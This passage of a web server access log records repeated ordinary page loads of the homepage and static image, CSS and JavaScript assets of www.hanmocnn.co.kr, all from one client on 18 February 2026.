Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:58:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:59:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:00:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr 